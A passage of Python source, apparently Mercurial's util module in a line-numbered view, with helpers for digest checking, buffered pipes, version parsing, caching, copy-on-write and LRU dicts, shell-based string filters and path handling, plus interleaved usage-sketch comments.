272 272 if k in supported:
273 273 return k
274 274 return None
275 275
276 276 class digestchecker(object):
277 277 """file handle wrapper that additionally checks content against a given
278 278 size and digests.
279 279
280 280 d = digestchecker(fh, size, {'md5': '...'})
281 281
282 282 When multiple digests are given, all of them are validated.
283 283 """
284 284
285 285 def __init__(self, fh, size, digests):
286 286 self._fh = fh
287 287 self._size = size
288 288 self._got = 0
289 289 self._digests = dict(digests)
290 290 self._digester = digester(self._digests.keys())
291 291
292 292 def read(self, length=-1):
293 293 content = self._fh.read(length)
294 294 self._digester.update(content)
295 295 self._got += len(content)
296 296 return content
297 297
298 298 def validate(self):
299 299 if self._size != self._got:
300 300 raise Abort(_('size mismatch: expected %d, got %d') %
301 301 (self._size, self._got))
302 302 for k, v in self._digests.items():
303 303 if v != self._digester[k]:
304 304 # i18n: first parameter is a digest name
305 305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 306 (k, v, self._digester[k]))
307 307
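# A minimal usage sketch (hypothetical payload; io.BytesIO stands in for a
# real transfer stream): read through the wrapper, then validate() checks
# the size and every digest in one place.
#
#   import hashlib, io
#   payload = b'foo'
#   fh = digestchecker(io.BytesIO(payload), len(payload),
#                      {'sha1': hashlib.sha1(payload).hexdigest()})
#   while fh.read(4096):
#       pass
#   fh.validate()   # raises Abort on size or digest mismatch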
308 308 try:
309 309 buffer = buffer
310 310 except NameError:
311 311 def buffer(sliceable, offset=0, length=None):
312 312 if length is not None:
313 313 return memoryview(sliceable)[offset:offset + length]
314 314 return memoryview(sliceable)[offset:]
315 315
316 316 closefds = pycompat.isposix
317 317
318 318 _chunksize = 4096
319 319
320 320 class bufferedinputpipe(object):
321 321 """a manually buffered input pipe
322 322
323 323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 324 the same time. We cannot probe the buffer state and select will not detect
325 325 that data are ready to read if they are already buffered.
326 326
327 327 This class lets us work around that by implementing its own buffering
328 328 (allowing efficient readline) while offering a way to know if the buffer is
329 329 empty from the outside (allowing collaboration of the buffer with polling).
330 330
331 331 This class lives in the 'util' module because it makes use of the 'os'
332 332 module from the python stdlib.
333 333 """
334 334
335 335 def __init__(self, input):
336 336 self._input = input
337 337 self._buffer = []
338 338 self._eof = False
339 339 self._lenbuf = 0
340 340
341 341 @property
342 342 def hasbuffer(self):
343 343 """True if any data is currently buffered
344 344
345 345 This will be used externally as a pre-step for polling IO. If there is
346 346 already data then no polling should be set in place."""
347 347 return bool(self._buffer)
348 348
349 349 @property
350 350 def closed(self):
351 351 return self._input.closed
352 352
353 353 def fileno(self):
354 354 return self._input.fileno()
355 355
356 356 def close(self):
357 357 return self._input.close()
358 358
359 359 def read(self, size):
360 360 while (not self._eof) and (self._lenbuf < size):
361 361 self._fillbuffer()
362 362 return self._frombuffer(size)
363 363
364 364 def readline(self, *args, **kwargs):
365 365 if 1 < len(self._buffer):
366 366 # this should not happen because both read and readline end with a
367 367 # _frombuffer call that collapses it.
368 368 self._buffer = [''.join(self._buffer)]
369 369 self._lenbuf = len(self._buffer[0])
370 370 lfi = -1
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 while (not self._eof) and lfi < 0:
374 374 self._fillbuffer()
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find('\n')
377 377 size = lfi + 1
378 378 if lfi < 0: # end of file
379 379 size = self._lenbuf
380 380 elif 1 < len(self._buffer):
381 381 # we need to take previous chunks into account
382 382 size += self._lenbuf - len(self._buffer[-1])
383 383 return self._frombuffer(size)
384 384
385 385 def _frombuffer(self, size):
386 386 """return at most 'size' data from the buffer
387 387
388 388 The data are removed from the buffer."""
389 389 if size == 0 or not self._buffer:
390 390 return ''
391 391 buf = self._buffer[0]
392 392 if 1 < len(self._buffer):
393 393 buf = ''.join(self._buffer)
394 394
395 395 data = buf[:size]
396 396 buf = buf[len(data):]
397 397 if buf:
398 398 self._buffer = [buf]
399 399 self._lenbuf = len(buf)
400 400 else:
401 401 self._buffer = []
402 402 self._lenbuf = 0
403 403 return data
404 404
405 405 def _fillbuffer(self):
406 406 """read data to the buffer"""
407 407 data = os.read(self._input.fileno(), _chunksize)
408 408 if not data:
409 409 self._eof = True
410 410 else:
411 411 self._lenbuf += len(data)
412 412 self._buffer.append(data)
413 413
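# A minimal usage sketch (assumes a POSIX pipe; illustrative only):
#
#   import os
#   rfd, wfd = os.pipe()
#   os.write(wfd, b'first\nsecond\n')
#   bip = bufferedinputpipe(os.fdopen(rfd, 'rb'))
#   line = bip.readline()    # b'first\n'
#   if not bip.hasbuffer:
#       pass                 # only now is it safe to block in select/poll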
414 414 def mmapread(fp):
415 415 try:
416 416 fd = getattr(fp, 'fileno', lambda: fp)()
417 417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 418 except ValueError:
419 419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 420 # if the file is empty, and if so, return an empty buffer.
421 421 if os.fstat(fd).st_size == 0:
422 422 return ''
423 423 raise
424 424
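# A minimal usage sketch (made-up path): mmapread() gives zero-copy access
# to file contents, with the empty-file special case handled above.
#
#   with open('somefile', 'rb') as fp:
#       data = mmapread(fp)
#       nbytes = len(data)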
425 425 def popen2(cmd, env=None, newlines=False):
426 426 # Setting bufsize to -1 lets the system decide the buffer size.
427 427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 430 close_fds=closefds,
431 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 432 universal_newlines=newlines,
433 433 env=env)
434 434 return p.stdin, p.stdout
435 435
436 436 def popen3(cmd, env=None, newlines=False):
437 437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 438 return stdin, stdout, stderr
439 439
440 440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 442 close_fds=closefds,
443 443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 444 stderr=subprocess.PIPE,
445 445 universal_newlines=newlines,
446 446 env=env)
447 447 return p.stdin, p.stdout, p.stderr, p
448 448
449 449 def version():
450 450 """Return version information if available."""
451 451 try:
452 452 from . import __version__
453 453 return __version__.version
454 454 except ImportError:
455 455 return 'unknown'
456 456
457 457 def versiontuple(v=None, n=4):
458 458 """Parses a Mercurial version string into an N-tuple.
459 459
460 460 The version string to be parsed is specified with the ``v`` argument.
461 461 If it isn't defined, the current Mercurial version string will be parsed.
462 462
463 463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 464 returned values:
465 465
466 466 >>> v = b'3.6.1+190-df9b73d2d444'
467 467 >>> versiontuple(v, 2)
468 468 (3, 6)
469 469 >>> versiontuple(v, 3)
470 470 (3, 6, 1)
471 471 >>> versiontuple(v, 4)
472 472 (3, 6, 1, '190-df9b73d2d444')
473 473
474 474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 475 (3, 6, 1, '190-df9b73d2d444+20151118')
476 476
477 477 >>> v = b'3.6'
478 478 >>> versiontuple(v, 2)
479 479 (3, 6)
480 480 >>> versiontuple(v, 3)
481 481 (3, 6, None)
482 482 >>> versiontuple(v, 4)
483 483 (3, 6, None, None)
484 484
485 485 >>> v = b'3.9-rc'
486 486 >>> versiontuple(v, 2)
487 487 (3, 9)
488 488 >>> versiontuple(v, 3)
489 489 (3, 9, None)
490 490 >>> versiontuple(v, 4)
491 491 (3, 9, None, 'rc')
492 492
493 493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 494 >>> versiontuple(v, 2)
495 495 (3, 9)
496 496 >>> versiontuple(v, 3)
497 497 (3, 9, None)
498 498 >>> versiontuple(v, 4)
499 499 (3, 9, None, 'rc+2-02a8fea4289b')
500 500 """
501 501 if not v:
502 502 v = version()
503 503 parts = remod.split('[\+-]', v, 1)
504 504 if len(parts) == 1:
505 505 vparts, extra = parts[0], None
506 506 else:
507 507 vparts, extra = parts
508 508
509 509 vints = []
510 510 for i in vparts.split('.'):
511 511 try:
512 512 vints.append(int(i))
513 513 except ValueError:
514 514 break
515 515 # (3, 6) -> (3, 6, None)
516 516 while len(vints) < 3:
517 517 vints.append(None)
518 518
519 519 if n == 2:
520 520 return (vints[0], vints[1])
521 521 if n == 3:
522 522 return (vints[0], vints[1], vints[2])
523 523 if n == 4:
524 524 return (vints[0], vints[1], vints[2], extra)
525 525
526 526 # used by parsedate
527 527 defaultdateformats = (
528 528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 529 '%Y-%m-%dT%H:%M', # without seconds
530 530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 531 '%Y-%m-%dT%H%M', # without seconds
532 532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 533 '%Y-%m-%d %H:%M', # without seconds
534 534 '%Y-%m-%d %H%M%S', # without :
535 535 '%Y-%m-%d %H%M', # without seconds
536 536 '%Y-%m-%d %I:%M:%S%p',
537 537 '%Y-%m-%d %H:%M',
538 538 '%Y-%m-%d %I:%M%p',
539 539 '%Y-%m-%d',
540 540 '%m-%d',
541 541 '%m/%d',
542 542 '%m/%d/%y',
543 543 '%m/%d/%Y',
544 544 '%a %b %d %H:%M:%S %Y',
545 545 '%a %b %d %I:%M:%S%p %Y',
546 546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 547 '%b %d %H:%M:%S %Y',
548 548 '%b %d %I:%M:%S%p %Y',
549 549 '%b %d %H:%M:%S',
550 550 '%b %d %I:%M:%S%p',
551 551 '%b %d %H:%M',
552 552 '%b %d %I:%M%p',
553 553 '%b %d %Y',
554 554 '%b %d',
555 555 '%H:%M:%S',
556 556 '%I:%M:%S%p',
557 557 '%H:%M',
558 558 '%I:%M%p',
559 559 )
560 560
561 561 extendeddateformats = defaultdateformats + (
562 562 "%Y",
563 563 "%Y-%m",
564 564 "%b",
565 565 "%b %Y",
566 566 )
567 567
568 568 def cachefunc(func):
569 569 '''cache the result of function calls'''
570 570 # XXX doesn't handle keywords args
571 571 if func.__code__.co_argcount == 0:
572 572 cache = []
573 573 def f():
574 574 if len(cache) == 0:
575 575 cache.append(func())
576 576 return cache[0]
577 577 return f
578 578 cache = {}
579 579 if func.__code__.co_argcount == 1:
580 580 # we gain a small amount of time because
581 581 # we don't need to pack/unpack the list
582 582 def f(arg):
583 583 if arg not in cache:
584 584 cache[arg] = func(arg)
585 585 return cache[arg]
586 586 else:
587 587 def f(*args):
588 588 if args not in cache:
589 589 cache[args] = func(*args)
590 590 return cache[args]
591 591
592 592 return f
593 593
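# A minimal usage sketch (hypothetical function): results are memoized per
# argument, so repeated calls with the same value skip the computation.
#
#   @cachefunc
#   def square(x):
#       return x * x
#   square(4)   # computed and cached
#   square(4)   # returned from the cache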
594 594 class cow(object):
595 595 """helper class to make copy-on-write easier
596 596
597 597 Call preparewrite before doing any writes.
598 598 """
599 599
600 600 def preparewrite(self):
601 601 """call this before writes, return self or a copied new object"""
602 602 if getattr(self, '_copied', 0):
603 603 self._copied -= 1
604 604 return self.__class__(self)
605 605 return self
606 606
607 607 def copy(self):
608 608 """always do a cheap copy"""
609 609 self._copied = getattr(self, '_copied', 0) + 1
610 610 return self
611 611
612 612 class sortdict(collections.OrderedDict):
613 613 '''a simple sorted dictionary
614 614
615 615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 616 >>> d2 = d1.copy()
617 617 >>> d2
618 618 sortdict([('a', 0), ('b', 1)])
619 619 >>> d2.update([(b'a', 2)])
620 620 >>> list(d2.keys()) # should still be in last-set order
621 621 ['b', 'a']
622 622 '''
623 623
624 624 def __setitem__(self, key, value):
625 625 if key in self:
626 626 del self[key]
627 627 super(sortdict, self).__setitem__(key, value)
628 628
629 629 if pycompat.ispypy:
630 630 # __setitem__() isn't called as of PyPy 5.8.0
631 631 def update(self, src):
632 632 if isinstance(src, dict):
633 633 src = src.iteritems()
634 634 for k, v in src:
635 635 self[k] = v
636 636
637 637 class cowdict(cow, dict):
638 638 """copy-on-write dict
639 639
640 640 Be sure to call d = d.preparewrite() before writing to d.
641 641
642 642 >>> a = cowdict()
643 643 >>> a is a.preparewrite()
644 644 True
645 645 >>> b = a.copy()
646 646 >>> b is a
647 647 True
648 648 >>> c = b.copy()
649 649 >>> c is a
650 650 True
651 651 >>> a = a.preparewrite()
652 652 >>> b is a
653 653 False
654 654 >>> a is a.preparewrite()
655 655 True
656 656 >>> c = c.preparewrite()
657 657 >>> b is c
658 658 False
659 659 >>> b is b.preparewrite()
660 660 True
661 661 """
662 662
663 663 class cowsortdict(cow, sortdict):
664 664 """copy-on-write sortdict
665 665
666 666 Be sure to call d = d.preparewrite() before writing to d.
667 667 """
668 668
669 669 class transactional(object):
670 670 """Base class for making a transactional type into a context manager."""
671 671 __metaclass__ = abc.ABCMeta
672 672
673 673 @abc.abstractmethod
674 674 def close(self):
675 675 """Successfully closes the transaction."""
676 676
677 677 @abc.abstractmethod
678 678 def release(self):
679 679 """Marks the end of the transaction.
680 680
681 681 If the transaction has not been closed, it will be aborted.
682 682 """
683 683
684 684 def __enter__(self):
685 685 return self
686 686
687 687 def __exit__(self, exc_type, exc_val, exc_tb):
688 688 try:
689 689 if exc_type is None:
690 690 self.close()
691 691 finally:
692 692 self.release()
693 693
694 694 @contextlib.contextmanager
695 695 def acceptintervention(tr=None):
696 696 """A context manager that closes the transaction on InterventionRequired
697 697
698 698 If no transaction was provided, this simply runs the body and returns
699 699 """
700 700 if not tr:
701 701 yield
702 702 return
703 703 try:
704 704 yield
705 705 tr.close()
706 706 except error.InterventionRequired:
707 707 tr.close()
708 708 raise
709 709 finally:
710 710 tr.release()
711 711
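# A minimal usage sketch (tr is any transactional object; dosomething() is
# a hypothetical body): InterventionRequired closes the transaction rather
# than aborting it, so the user can fix things up and resume.
#
#   with acceptintervention(tr):
#       dosomething()   # may raise error.InterventionRequired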
712 712 @contextlib.contextmanager
713 713 def nullcontextmanager():
714 714 yield
715 715
716 716 class _lrucachenode(object):
717 717 """A node in a doubly linked list.
718 718
719 719 Holds a reference to nodes on either side as well as a key-value
720 720 pair for the dictionary entry.
721 721 """
722 722 __slots__ = (u'next', u'prev', u'key', u'value')
723 723
724 724 def __init__(self):
725 725 self.next = None
726 726 self.prev = None
727 727
728 728 self.key = _notset
729 729 self.value = None
730 730
731 731 def markempty(self):
732 732 """Mark the node as emptied."""
733 733 self.key = _notset
734 734
735 735 class lrucachedict(object):
736 736 """Dict that caches most recent accesses and sets.
737 737
738 738 The dict consists of an actual backing dict - indexed by original
739 739 key - and a doubly linked circular list defining the order of entries in
740 740 the cache.
741 741
742 742 The head node is the newest entry in the cache. If the cache is full,
743 743 we recycle head.prev and make it the new head. Cache accesses result in
744 744 the node being moved to before the existing head and being marked as the
745 745 new head node.
746 746 """
747 747 def __init__(self, max):
748 748 self._cache = {}
749 749
750 750 self._head = head = _lrucachenode()
751 751 head.prev = head
752 752 head.next = head
753 753 self._size = 1
754 754 self._capacity = max
755 755
756 756 def __len__(self):
757 757 return len(self._cache)
758 758
759 759 def __contains__(self, k):
760 760 return k in self._cache
761 761
762 762 def __iter__(self):
763 763 # We don't have to iterate in cache order, but why not.
764 764 n = self._head
765 765 for i in range(len(self._cache)):
766 766 yield n.key
767 767 n = n.next
768 768
769 769 def __getitem__(self, k):
770 770 node = self._cache[k]
771 771 self._movetohead(node)
772 772 return node.value
773 773
774 774 def __setitem__(self, k, v):
775 775 node = self._cache.get(k)
776 776 # Replace existing value and mark as newest.
777 777 if node is not None:
778 778 node.value = v
779 779 self._movetohead(node)
780 780 return
781 781
782 782 if self._size < self._capacity:
783 783 node = self._addcapacity()
784 784 else:
785 785 # Grab the last/oldest item.
786 786 node = self._head.prev
787 787
788 788 # At capacity. Kill the old entry.
789 789 if node.key is not _notset:
790 790 del self._cache[node.key]
791 791
792 792 node.key = k
793 793 node.value = v
794 794 self._cache[k] = node
795 795 # And mark it as newest entry. No need to adjust order since it
796 796 # is already self._head.prev.
797 797 self._head = node
798 798
799 799 def __delitem__(self, k):
800 800 node = self._cache.pop(k)
801 801 node.markempty()
802 802
803 803 # Temporarily mark as newest item before re-adjusting head to make
804 804 # this node the oldest item.
805 805 self._movetohead(node)
806 806 self._head = node.next
807 807
808 808 # Additional dict methods.
809 809
810 810 def get(self, k, default=None):
811 811 try:
812 812 return self._cache[k].value
813 813 except KeyError:
814 814 return default
815 815
816 816 def clear(self):
817 817 n = self._head
818 818 while n.key is not _notset:
819 819 n.markempty()
820 820 n = n.next
821 821
822 822 self._cache.clear()
823 823
824 824 def copy(self):
825 825 result = lrucachedict(self._capacity)
826 826 n = self._head.prev
827 827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 828 for i in range(len(self._cache)):
829 829 result[n.key] = n.value
830 830 n = n.prev
831 831 return result
832 832
833 833 def _movetohead(self, node):
834 834 """Mark a node as the newest, making it the new head.
835 835
836 836 When a node is accessed, it becomes the freshest entry in the LRU
837 837 list, which is denoted by self._head.
838 838
839 839 Visually, let's make ``N`` the new head node (* denotes head):
840 840
841 841 previous/oldest <-> head <-> next/next newest
842 842
843 843 ----<->--- A* ---<->-----
844 844 | |
845 845 E <-> D <-> N <-> C <-> B
846 846
847 847 To:
848 848
849 849 ----<->--- N* ---<->-----
850 850 | |
851 851 E <-> D <-> C <-> B <-> A
852 852
853 853 This requires the following moves:
854 854
855 855 C.next = D (node.prev.next = node.next)
856 856 D.prev = C (node.next.prev = node.prev)
857 857 E.next = N (head.prev.next = node)
858 858 N.prev = E (node.prev = head.prev)
859 859 N.next = A (node.next = head)
860 860 A.prev = N (head.prev = node)
861 861 """
862 862 head = self._head
863 863 # C.next = D
864 864 node.prev.next = node.next
865 865 # D.prev = C
866 866 node.next.prev = node.prev
867 867 # N.prev = E
868 868 node.prev = head.prev
869 869 # N.next = A
870 870 # It is tempting to do just "head" here, but if node is
871 871 # adjacent to head, this will do bad things.
872 872 node.next = head.prev.next
873 873 # E.next = N
874 874 node.next.prev = node
875 875 # A.prev = N
876 876 node.prev.next = node
877 877
878 878 self._head = node
879 879
880 880 def _addcapacity(self):
881 881 """Add a node to the circular linked list.
882 882
883 883 The new node is inserted before the head node.
884 884 """
885 885 head = self._head
886 886 node = _lrucachenode()
887 887 head.prev.next = node
888 888 node.prev = head.prev
889 889 node.next = head
890 890 head.prev = node
891 891 self._size += 1
892 892 return node
893 893
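# A minimal usage sketch (made-up keys): once at capacity, inserts recycle
# the oldest node of the circular list instead of allocating a new one.
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']        # refreshes 'a', so 'b' is now the oldest entry
#   d['c'] = 3    # evicts 'b'
#   assert 'a' in d and 'b' not in d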
894 894 def lrucachefunc(func):
895 895 '''cache most recent results of function calls'''
896 896 cache = {}
897 897 order = collections.deque()
898 898 if func.__code__.co_argcount == 1:
899 899 def f(arg):
900 900 if arg not in cache:
901 901 if len(cache) > 20:
902 902 del cache[order.popleft()]
903 903 cache[arg] = func(arg)
904 904 else:
905 905 order.remove(arg)
906 906 order.append(arg)
907 907 return cache[arg]
908 908 else:
909 909 def f(*args):
910 910 if args not in cache:
911 911 if len(cache) > 20:
912 912 del cache[order.popleft()]
913 913 cache[args] = func(*args)
914 914 else:
915 915 order.remove(args)
916 916 order.append(args)
917 917 return cache[args]
918 918
919 919 return f
920 920
921 921 class propertycache(object):
922 922 def __init__(self, func):
923 923 self.func = func
924 924 self.name = func.__name__
925 925 def __get__(self, obj, type=None):
926 926 result = self.func(obj)
927 927 self.cachevalue(obj, result)
928 928 return result
929 929
930 930 def cachevalue(self, obj, value):
931 931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 932 obj.__dict__[self.name] = value
933 933
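# A minimal usage sketch (hypothetical class and helper): the first access
# runs the function and cachevalue() stores the result in the instance
# __dict__, so later accesses bypass the descriptor entirely.
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return computesomething()   # hypothetical helper
#   r = repoish()
#   r.expensive   # computed once
#   r.expensive   # plain __dict__ lookup from here on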
934 934 def pipefilter(s, cmd):
935 935 '''filter string S through command CMD, returning its output'''
936 936 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 937 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 938 pout, perr = p.communicate(s)
939 939 return pout
940 940
941 941 def tempfilter(s, cmd):
942 942 '''filter string S through a pair of temporary files with CMD.
943 943 CMD is used as a template to create the real command to be run,
944 944 with the strings INFILE and OUTFILE replaced by the real names of
945 945 the temporary files generated.'''
946 946 inname, outname = None, None
947 947 try:
948 948 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 949 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 950 fp.write(s)
951 951 fp.close()
952 952 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 953 os.close(outfd)
954 954 cmd = cmd.replace('INFILE', inname)
955 955 cmd = cmd.replace('OUTFILE', outname)
956 956 code = os.system(cmd)
957 957 if pycompat.sysplatform == 'OpenVMS' and code & 1:
958 958 code = 0
959 959 if code:
960 960 raise Abort(_("command '%s' failed: %s") %
961 961 (cmd, explainexit(code)))
962 962 return readfile(outname)
963 963 finally:
964 964 try:
965 965 if inname:
966 966 os.unlink(inname)
967 967 except OSError:
968 968 pass
969 969 try:
970 970 if outname:
971 971 os.unlink(outname)
972 972 except OSError:
973 973 pass
974 974
975 975 filtertable = {
976 976 'tempfile:': tempfilter,
977 977 'pipe:': pipefilter,
978 978 }
979 979
980 980 def filter(s, cmd):
981 981 "filter a string through a command that transforms its input to its output"
982 982 for name, fn in filtertable.iteritems():
983 983 if cmd.startswith(name):
984 984 return fn(s, cmd[len(name):].lstrip())
985 985 return pipefilter(s, cmd)
986 986
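# A minimal usage sketch (hypothetical commands): the cmd prefix selects
# the strategy from filtertable; anything unprefixed goes through a pipe.
#
#   filter('text', 'pipe: tr a-z A-Z')
#   filter('text', 'tempfile: sort INFILE > OUTFILE')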
987 987 def binary(s):
988 988 """return true if a string is binary data"""
989 989 return bool(s and '\0' in s)
990 990
991 991 def increasingchunks(source, min=1024, max=65536):
992 992 '''return no less than min bytes per chunk while data remains,
993 993 doubling min after each chunk until it reaches max'''
994 994 def log2(x):
995 995 if not x:
996 996 return 0
997 997 i = 0
998 998 while x:
999 999 x >>= 1
1000 1000 i += 1
1001 1001 return i - 1
1002 1002
1003 1003 buf = []
1004 1004 blen = 0
1005 1005 for chunk in source:
1006 1006 buf.append(chunk)
1007 1007 blen += len(chunk)
1008 1008 if blen >= min:
1009 1009 if min < max:
1010 1010 min = min << 1
1011 1011 nmin = 1 << log2(blen)
1012 1012 if nmin > min:
1013 1013 min = nmin
1014 1014 if min > max:
1015 1015 min = max
1016 1016 yield ''.join(buf)
1017 1017 blen = 0
1018 1018 buf = []
1019 1019 if buf:
1020 1020 yield ''.join(buf)
1021 1021
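# A minimal worked example (made-up chunk sizes): eight 512-byte chunks
# with min=1024 and max=4096 coalesce into chunks of 1024, 2048 and 1024
# bytes, since the minimum doubles after each yield.
#
#   source = (b'x' * 512 for _ in range(8))
#   sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
#   assert sizes == [1024, 2048, 1024]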
1022 1022 Abort = error.Abort
1023 1023
1024 1024 def always(fn):
1025 1025 return True
1026 1026
1027 1027 def never(fn):
1028 1028 return False
1029 1029
1030 1030 def nogc(func):
1031 1031 """disable garbage collector
1032 1032
1033 1033 Python's garbage collector triggers a GC each time a certain number of
1034 1034 container objects (the number being defined by gc.get_threshold()) are
1035 1035 allocated even when marked not to be tracked by the collector. Tracking has
1036 1036 no effect on when GCs are triggered, only on what objects the GC looks
1037 1037 into. As a workaround, disable GC while building complex (huge)
1038 1038 containers.
1039 1039
1040 1040 This garbage collector issue has been fixed in 2.7, but it still affects
1041 1041 CPython's performance.
1042 1042 """
1043 1043 def wrapper(*args, **kwargs):
1044 1044 gcenabled = gc.isenabled()
1045 1045 gc.disable()
1046 1046 try:
1047 1047 return func(*args, **kwargs)
1048 1048 finally:
1049 1049 if gcenabled:
1050 1050 gc.enable()
1051 1051 return wrapper
1052 1052
1053 1053 if pycompat.ispypy:
1054 1054 # PyPy runs slower with gc disabled
1055 1055 nogc = lambda x: x
1056 1056
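# A minimal usage sketch (hypothetical builder): decorate code that
# allocates huge containers so the collector stays out of the way.
#
#   @nogc
#   def buildindex(entries):
#       return dict((e, i) for i, e in enumerate(entries))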
1057 1057 def pathto(root, n1, n2):
1058 1058 '''return the relative path from one place to another.
1059 1059 root should use os.sep to separate directories
1060 1060 n1 should use os.sep to separate directories
1061 1061 n2 should use "/" to separate directories
1062 1062 returns an os.sep-separated path.
1063 1063
1064 1064 If n1 is a relative path, it's assumed it's
1065 1065 relative to root.
1066 1066 n2 should always be relative to root.
1067 1067 '''
1068 1068 if not n1:
1069 1069 return localpath(n2)
1070 1070 if os.path.isabs(n1):
1071 1071 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1072 1072 return os.path.join(root, localpath(n2))
1073 1073 n2 = '/'.join((pconvert(root), n2))
1074 1074 a, b = splitpath(n1), n2.split('/')
1075 1075 a.reverse()
1076 1076 b.reverse()
1077 1077 while a and b and a[-1] == b[-1]:
1078 1078 a.pop()
1079 1079 b.pop()
1080 1080 b.reverse()
1081 1081 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1082 1082
1083 1083 def mainfrozen():
1084 1084 """return True if we are a frozen executable.
1085 1085
1086 1086 The code supports py2exe (most common, Windows only) and tools/freeze
1087 1087 (portable, not much used).
1088 1088 """
1089 1089 return (safehasattr(sys, "frozen") or # new py2exe
1090 1090 safehasattr(sys, "importers") or # old py2exe
1091 1091 imp.is_frozen(u"__main__")) # tools/freeze
1092 1092
1093 1093 # the location of data files matching the source code
1094 1094 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1095 1095 # executable version (py2exe) doesn't support __file__
1096 1096 datapath = os.path.dirname(pycompat.sysexecutable)
1097 1097 else:
1098 1098 datapath = os.path.dirname(pycompat.fsencode(__file__))
1099 1099
1100 1100 i18n.setdatapath(datapath)
1101 1101
1102 1102 _hgexecutable = None
1103 1103
1104 1104 def hgexecutable():
1105 1105 """return location of the 'hg' executable.
1106 1106
1107 1107 Defaults to $HG or 'hg' in the search path.
1108 1108 """
1109 1109 if _hgexecutable is None:
1110 1110 hg = encoding.environ.get('HG')
1111 1111 mainmod = sys.modules[pycompat.sysstr('__main__')]
1112 1112 if hg:
1113 1113 _sethgexecutable(hg)
1114 1114 elif mainfrozen():
1115 1115 if getattr(sys, 'frozen', None) == 'macosx_app':
1116 1116 # Env variable set by py2app
1117 1117 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1118 1118 else:
1119 1119 _sethgexecutable(pycompat.sysexecutable)
1120 1120 elif (os.path.basename(
1121 1121 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1122 1122 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1123 1123 else:
1124 1124 exe = findexe('hg') or os.path.basename(sys.argv[0])
1125 1125 _sethgexecutable(exe)
1126 1126 return _hgexecutable
1127 1127
1128 1128 def _sethgexecutable(path):
1129 1129 """set location of the 'hg' executable"""
1130 1130 global _hgexecutable
1131 1131 _hgexecutable = path
1132 1132
1133 1133 def _isstdout(f):
1134 1134 fileno = getattr(f, 'fileno', None)
1135 1135 return fileno and fileno() == sys.__stdout__.fileno()
1136 1136
1137 1137 def shellenviron(environ=None):
1138 1138 """return environ with optional override, useful for shelling out"""
1139 1139 def py2shell(val):
1140 1140 'convert python object into string that is useful to shell'
1141 1141 if val is None or val is False:
1142 1142 return '0'
1143 1143 if val is True:
1144 1144 return '1'
1145 1145 return str(val)
1146 1146 env = dict(encoding.environ)
1147 1147 if environ:
1148 1148 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1149 1149 env['HG'] = hgexecutable()
1150 1150 return env
1151 1151
1152 1152 def system(cmd, environ=None, cwd=None, out=None):
1153 1153 '''enhanced shell command execution.
1154 1154 run with environment maybe modified, maybe in different dir.
1155 1155
1156 1156 if out is specified, it is assumed to be a file-like object that has a
1157 1157 write() method. stdout and stderr will be redirected to out.'''
1158 1158 try:
1159 1159 stdout.flush()
1160 1160 except Exception:
1161 1161 pass
1162 1162 cmd = quotecommand(cmd)
1163 1163 env = shellenviron(environ)
1164 1164 if out is None or _isstdout(out):
1165 1165 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1166 1166 env=env, cwd=cwd)
1167 1167 else:
1168 1168 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1169 1169 env=env, cwd=cwd, stdout=subprocess.PIPE,
1170 1170 stderr=subprocess.STDOUT)
1171 1171 for line in iter(proc.stdout.readline, ''):
1172 1172 out.write(line)
1173 1173 proc.wait()
1174 1174 rc = proc.returncode
1175 1175 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1176 1176 rc = 0
1177 1177 return rc
1178 1178
1179 1179 def checksignature(func):
1180 1180 '''wrap a function with code to check for calling errors'''
1181 1181 def check(*args, **kwargs):
1182 1182 try:
1183 1183 return func(*args, **kwargs)
1184 1184 except TypeError:
1185 1185 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1186 1186 raise error.SignatureError
1187 1187 raise
1188 1188
1189 1189 return check
1190 1190
1191 1191 # a whitelist of known filesystems where hardlinks work reliably
1192 1192 _hardlinkfswhitelist = {
1193 1193 'btrfs',
1194 1194 'ext2',
1195 1195 'ext3',
1196 1196 'ext4',
1197 1197 'hfs',
1198 1198 'jfs',
1199 1199 'reiserfs',
1200 1200 'tmpfs',
1201 1201 'ufs',
1202 1202 'xfs',
